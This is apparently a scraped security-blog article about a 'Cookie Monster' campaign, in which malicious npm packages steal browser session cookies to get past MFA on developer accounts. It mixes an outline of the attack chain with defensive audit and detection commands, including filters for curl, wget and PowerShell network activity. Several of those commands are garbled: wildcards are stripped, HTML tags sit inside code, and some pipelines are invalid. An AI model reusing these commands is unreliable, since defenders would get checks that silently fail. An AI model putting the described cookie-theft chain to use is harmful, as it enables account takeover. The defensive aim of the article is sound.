Operation Cookie Monster: How Hackers Stole Your GitHub Account and Why 2FA Isn’t Enough + Video

Listen to this Post

Featured Image

Introduction:

A sophisticated, credential-stealing campaign dubbed “Cookie Monster” is targeting software developers by hijacking browser sessions to bypass multi-factor authentication (MFA). This attack doesn’t just steal passwords; it pilfers session cookies, granting attackers direct, authenticated access to accounts on platforms like GitHub, GitLab, and potentially Google or Microsoft services. This article deconstructs the attack chain, from malicious npm packages to cookie theft, and provides actionable defense strategies for developers and enterprises.

Learning Objectives:

  • Understand the “Cookie Monster” attack flow from dependency poisoning to session hijacking.
  • Learn to identify malicious npm packages and suspicious system processes.
  • Implement terminal and browser hardening techniques to mitigate session cookie theft.

You Should Know:

  1. The Attack Vector: Malicious npm Packages & OAuth Phishing
    The attack begins with social engineering or typosquatting, tricking developers into installing a malicious npm package. Alternatively, attackers use fake OAuth applications on platforms like GitHub, requesting excessive permissions. Once authorized, these apps can access user data and repositories. The malicious package, once installed, executes a post-install script that deploys the real payload.

Step-by-step guide:

1. Dependency Check: Always audit packages before installation.

 Check npm package info and recent versions for anomalies
npm view <package-name>
 Use `npm audit` on your project regularly
npm audit

2. OAuth Audit: Regularly review authorized applications on your accounts.
– GitHub: Settings > Applications > Authorized OAuth Apps.
– Revoke any unfamiliar or unused applications.

2. The Payload: Cross-Platform Cookie Hijackers

The post-install script downloads a platform-specific binary (e.g., `cookies.exe` for Windows, a disguised `.AppImage` for Linux). This binary is a stealer designed to locate, decrypt, and exfiltrate session cookies from browsers like Chrome, Edge, and Brave. It targets specific paths and uses the system’s cryptographic APIs to decrypt cookies stored in databases like `Cookies` in `%LocalAppData%` or ~/.config.

Step-by-step guide (Identification):

  1. Linux Process Inspection: Check for suspicious processes using system monitoring tools.
    List all running processes and look for unknown binaries
    ps aux | grep -E '(cook|AppImage|update)'
    Check for recently modified binaries in /tmp or home directories
    find ~ /tmp -type f -name ".AppImage" -o -name "cook" -mtime -1
    

2. Windows Command Prompt/PS:

tasklist /v | findstr /i "cookie update"
Get-Process | Where-Object {$<em>.ProcessName -like "cook" -or $</em>.Path -like "tmp"}

3. Data Exfiltration: C2 Communication and Evasion

The stolen cookies are encrypted and sent to a Command and Control (C2) server, often via a POST request to a legitimate-looking domain (e.g., contentfonts[.]org). The malware uses `curl` or `wget` on Linux and `PowerShell` on Windows for this communication, often blending with normal traffic.

Step-by-step guide (Network Monitoring):

  1. Linux: Use `netstat` or `ss` to spot unexpected connections.
    Monitor outbound connections in real-time
    sudo ss -tunp | grep -E '(curl|wget|powershell)'
    
  2. Windows: Use built-in tools like `netstat` or Resource Monitor.
    netstat -ano | findstr ESTABLISHED
    In PowerShell, filter processes making network calls
    Get-NetTCPConnection -State Established | Select-Object LocalAddress,RemoteAddress,OwningProcess | Get-Process -Id {OwningProcess}
    

  3. Mitigation 1: Hardening Your Browser & Session Security
    Since the attack relies on stealing cookies, make it harder for stealers to access and use them.

Step-by-step guide:

  1. Use Profile Separation: Employ different browser profiles or even separate browsers for sensitive development accounts (GitHub) versus general browsing.
  2. Lock Browser Profiles: Use browser features or extensions that require a password to access saved passwords/cookies.
  3. Clear Sessions: Log out of critical accounts after use, especially on shared machines. This invalidates the session cookie.
  4. Review Active Sessions: On platforms like GitHub, regularly check and revoke unfamiliar active sessions under security settings.

5. Mitigation 2: System-Level Protections and Monitoring

Defend against the initial execution and persistence of the stealer binary.

Step-by-step guide:

1. Linux File Integrity & Permissions:

 Set restrictive permissions on browser cookie directories (may break updates)
chmod 700 ~/.config/google-chrome/Default
 Use tools like `auditd` to monitor access to critical files
sudo auditctl -w ~/.config/google-chrome/Default/Cookies -p war -k browser_cookies

2. Windows Defender Application Control (WDAC): Create a policy to allow only authorized software.

 Begin WDAC policy creation (requires admin)
New-CIPolicy -Level Publisher -FilePath C:\Policy.xml -UserPEs

3. Endpoint Detection and Response (EDR): Ensure EDR/AV is running and configured to alert on suspicious process spawning (e.g., `curl` spawning from an npm post-install script).

6. For Organizations: Secure Software Development Lifecycle (SSDL)

Enterprises must shift security left to prevent such attacks at the source.

Step-by-step guide:

  1. Mandate Package Audits: Use automated tools in CI/CD pipelines.
    Example GitHub Action step for npm audit</li>
    </ol>
    
    - name: Run npm audit
    run: npm audit --audit-level=high
    

    2. Implement Artifact Registry Proxies: Use private, vetted npm registries (like GitHub Packages, Artifactory) that cache public packages and scan for malware.
    3. Developer Security Training: Conduct regular training on software supply chain attacks, typosquatting, and OAuth security hygiene.

    What Undercode Say:

    • Session is the New Password: The era of password/MFA-only security is fading. The session token is now the crown jewel, and its protection requires a paradigm shift in defense strategies, focusing on endpoint integrity and browser hardening.
    • Supply Chain is the Soft Underbelly: Attacks leveraging trusted ecosystems (npm, OAuth) are devastatingly effective. Security must be embedded into the development pipeline itself, not bolted on at the perimeter.

    The “Cookie Monster” campaign exposes a fundamental weakness in modern authentication architecture. While MFA prevents credential stuffing, it is useless against session hijacking once the user is authenticated. This attack is not novel in technique but is highly targeted and effective against a high-value community: developers with code and infrastructure access. Future attacks will refine this model, targeting cookies for cloud consoles (AWS, Azure) and SaaS platforms, moving beyond data theft to direct resource hijacking and infrastructure sabotage. The defense requires a layered approach: vigilant developer practices, robust endpoint security, and a zero-trust mindset that treats every session as potentially compromised.

    ▶️ Related Video (80% Match):

    🎯Let’s Practice For Free:

    IT/Security Reporter URL:

    Reported By: Stephenpangborn Cybersecurity – Hackers Feeds
    Extra Hub: Undercode MoN
    Basic Verification: Pass ✅

    🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

    💬 Whatsapp | 💬 Telegram

    📢 Follow UndercodeTesting & Stay Tuned:

    𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky